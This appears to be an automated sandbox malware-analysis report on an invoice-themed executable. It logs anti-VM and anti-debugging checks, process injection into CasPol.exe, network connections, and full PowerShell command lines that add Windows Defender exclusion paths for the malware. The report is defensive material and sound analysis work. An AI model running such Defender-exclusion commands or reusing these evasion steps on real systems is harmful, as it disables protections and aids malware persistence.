Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

Code function: 17_2_0066FB3C sldt word ptr [eax]

17_2_0066FB3C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5198	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2028	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 6048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: foregroundWindowGot 503

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4388	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4476	Thread sleep time: -300000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 00000005.00000003.889239741.0000000004A60000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.954752445.0000000005098000.00000004.00000001.sdmp	Binary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000005.00000003.889239741.0000000004A60000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.954752445.0000000005098000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AdvancedRun.exe, 00000007.00000002.691945955.0000000000669000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899748414.00000000015BE000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.684245324.000001C21E860000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.962422235.0000000005600000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.733728304.0000019378B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.739078066.00000184296C0000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.967813030.0000000005C30000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000014.00000002.919540301.0000000000E9D000.00000004.00000020.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&00

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0040289F

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Network Connect: 104.21.71.230 80
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Network Connect: 172.67.172.17 80

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C73008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

7_2_00401C26

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
